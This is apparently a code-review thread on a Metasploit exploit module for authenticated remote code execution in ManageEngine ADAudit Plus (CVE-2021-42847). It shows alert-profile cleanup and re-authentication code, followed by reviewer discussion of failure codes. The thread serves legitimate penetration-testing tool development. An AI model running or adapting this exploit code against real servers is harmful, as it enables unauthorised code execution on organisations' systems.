modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb

```diff
@@ -0,0 +1,526 @@
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin']),
+    ])
+  end
+
+  def auth_domain
+    datastore['AUTH_DOMAIN']
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def delete_alert(adapcsrf_cookie)
+    print_status("Attempting to delete alert profile #{@alert_name}")
+    # let's try and get the the ID of the alert we want to delete
+    res_get_alert = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'api', 'json', 'leftTrees', 'getLeftTreeList'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'TAB_ID' => '5', # this cannot be randomized
+        'adapcsrf' => adapcsrf_cookie
+      }
+    })
+
+    unless res_get_alert
+      print_warning("Connection failed when attempting to obtain the alert profile ID #{@alert_name}. Manual cleanup required.")
+      return
+    end
+
+    unless res_get_alert.code == 200 && !res_get_alert.body.empty?
+      print_warning("Received unexpected reply when attempting to obtain the alert profile ID #{@alert_name}. Manual cleanup required.")
+      return
+    end
+
+    alert_id = res_get_alert.body.scan(/modelId":(\d+),"name":"#{@alert_name}/)&.flatten&.first
+    if alert_id.nil?
+      print_warning("Failed to obtain the alert profile ID #{@alert_name}. Manual cleanup required.")
+      return
+    end
+
+    # delete the alert
+    res_delete_alert = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'api', 'json', 'config', 'alertprofiles', 'delete'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'data' => { 'ids' => [alert_id] }.to_json,
+        'adapcsrf' => adapcsrf_cookie
+      }
+    })
+
+    unless res_delete_alert
+      print_warning("Connection failed when attempting to delete alert profile #{@alert_name}. Manual cleanup required.")
+      return
+    end
+
+    unless res_delete_alert.code == 200 && res_delete_alert.body.include?('Successfully deleted the alert profile')
+      print_warning("Received unexpected reply when attempting to delete alert profile #{@alert_name}. Manual cleanup required.")
+      return
+    end
+
+    print_good("Successfully deleted alert profile #{@alert_name}")
+  end
+
+  def create_alert_profile
+    if @exploit_method == 'cve_2021_42847'
+      print_status('Attempting to authenticate again in order to retrieve the required cookies.')
+      # we have to authenticate again in order to get the required cookie
+      cookie_jar.clear
+      login_results = adaudit_plus_login(auth_domain, username, password, true)
+      login_msg = login_results['message']
+      case login_results['status']
+      when adaudit_plus_status::CONNECTION_FAILED, adaudit_plus_status::UNEXPECTED_REPLY
+        fail_with(Failure::Unknown, login_msg)
+      when adaudit_plus_status::NO_ACCESS
+        fail_with(Failure::NoAccess, login_msg)
+      end
```

Comment:
What about NO_MATCH which is thrown by `adaudit_plus_grab_configured_domains` which is called by this method? This isn't being caught here.

Reply:
added

Reply:
I don't think this was resolved correctly. `NO_MATCH` appears to be being thrown when no configured Active Directory domains are found, or when no build number was obtained. I'd recommend two things:

1. Break these down into two separate errors. They are unrelated and grouping them like this causes confusion and may lead to errors in the code.
2. `Failure::NoAccess` doesn't make sense in this case. In the first case of no configured Active Directory domains its a `Failure::NotVulnerable` error I'm guessing due to the fact that no domains have been configured we can use for exploitation (unless you can use the domain that gets set up as part of the install for exploitation?) For the second case, aka no build number obtained, it should be `Failure::UnexpectedReply` as you were expecting a build number to be returned but couldn't find one.

Reply:
Agreed. I replaced `NO_MATCH` with `NO_DOMAINS` and `NO_BUILD_NUMBER` and used the failure statutes you suggested

Reply:
Thanks @ErikWynter looks a lot better now!